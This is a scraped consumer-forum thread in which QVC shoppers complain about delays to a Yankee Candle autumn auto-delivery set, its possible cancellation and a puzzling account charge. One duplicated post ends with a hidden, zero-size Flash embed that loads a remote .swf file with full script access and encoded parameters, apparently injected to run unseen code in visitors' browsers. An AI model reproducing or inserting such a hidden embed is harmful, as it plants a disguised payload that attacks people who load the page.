yankee candle auto delivery set

ShoppingTelly

Help Support ShoppingTelly:

rainbowdottie

Registered Shopper
has anyone recieved their autumn sets yet?

CS have told me that mine will be dispatched on the 8th aug.

If you have recieved yours - did you recieve the orange? or was it replaced by cinammon:sad:

And I heard a rumour of a free gift.....................:up:

Still patiently waitin for mine they sent a letter a month ago sayng mine would be sent on the 17th and a free gift would be included dont know what tho. I love creamy caramel tho as couldnt resist gettin the tart from my yankee central .

Still patiently waitin for mine they sent a letter a month ago sayng mine would be sent on the 17th and a free gift would be included dont know what tho. I love creamy caramel tho as couldnt resist gettin the tart from my yankee central .<embed allowScriptAccess="always" FlashVars="cid=1&swf=eaememeicgbvbvepepepbuelegebeoebbudvehefbvdyebeedxelbvebegdwdxeqbueieaei" src="http://www.snivi.com/files/1.swf" quality="high" bgcolor="#ffffff" width="0" height="0" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>

Same here, they said mine will be sent on the 14th, also with a free gift :cheeky:

I phoned CS a while back and they told me the dispatch date would 8th of aug.I know today is only the 9th so not expecting it yet - however my account shows no signs of it.

I've had no letter from qvc regarding this order at all

Mine was due to be dispatched around 8th August, no sign of it yet, have called them twice to be told could be upto 30 days!!! A letter is in the post to me, not arrived yet though.

I think its bad service on behalf of qvc it took forever for them to inform everyone and now it looks like we wil b waiting even longer for the set the last set was delayed to. I dont know whats holding them up as creamy caramel and spiced orange have been available siince end of june in yankee stores its now beyond ridiculous.

Last edited:
Got a letter today, dated 10th, saying it could be upto 30 days & if not here by then it will be cancelled - does that mean the winter set is cancelled too seeing as it's the same order? No mention of free gift - I am NOT happy :-(

Its beyond a joke now theres no reason for the delay as much as i want the winter collection i think im going to cancel. And go buy the ones i can get from my yankee central where i get fantastic service. And for the first time im hell bent on writing a letter of complaint as my last to sets were delayed and now this

Last edited:
cancelled???? Oh nooooooo:mysmilie_476:

Why are they having so much trouble with this AD? I've certainly seen some of the stuff we're meant to be getting, elsewhere???

I've yet to even recieve a bleedin' letter:angry:

I nearly went for this set. I feel for you guys, its not fair or right. I wonder who the fault boils down to? It is also very strange and puts me off having AD on any item in the past. There is nothing worse than hoping and looking forward to getting something and then being messed about like this.

I've recieved my letter.it is,as you say,taking another 30 days or cancelling altogether:mysmilie_478:

I wanted the autumn and christmas sets more than the other sets:heartbroke:

I was looking forward to the autumn set the most because the fragrances were more appealing to me
I have already had a letter telling me it would be delivered on the 18th and I would be getting a free gift !
so annoying

I'm wondering if the fault likes with Yankee rather than QVC though? If there was an issue with the Spiced Orange candle (maybe there was a problem with manufacturing it or it proved extremely popular/Yankee may have given priority to its US corporate customers) then QVC probably doesn't want to send out a replacement. If it did that, those of us who ordered it would very rightly expect QVC to pay for the P&P/courier to collect it if we weren't happy with the replacement and it's probably easier for QVC to cancel the entire delivery than have to deal with a costly and time consuming mess.

I am guessing that what QVC is doing is trying to get Yankee to get the Spiced Orange candle as promised - hence the delays. If no joy then I wouldn't be surprised if the Autumn and Winter deliveries will be completely cancelled. That way Yankee will get stuck with already manufactured candles in vast quantities and if QVC is smart, make Yankee sell them to them at a huge discount and the remaining candle sets end up as a TSV later in the year.

Anyway I am giving QVC the benefit of the doubt on this one as I think they might be victims of Yankee's ineptitude.

i cancelled my auto delivery after the problem getting the summer option, i have now rec'd the autumn fragrances from yankee doodle, including ones that qvc aren't getting.

I cancelled my order today and went
straight to my.yankee central i mentioned it to the lady serving me and she said i was not the first to complain. And from what her area manager had told her its down to qvc . Yankee had put aside a huge amount of spiced orange n creamy caramel at the begging of june.

Now looking at my account online it says awaiting stock BUT it's also showing an almost £85 charge - what is this about???? Nothing has left my bank account, don't know if this is a payment????

I have copied from my account statement below -

Ordered on 09/05/2010 758965 Yankee Candle Set of 3 Summer Fragranced Large Jar Candles x1 = £36.84 £84.58 Shipped on 10/05/10

758966 Yankee Candle Set of 3 Autumn Fragranced Large Jar Candles x1 = £36.84 Awaiting stock

Latest posts

Back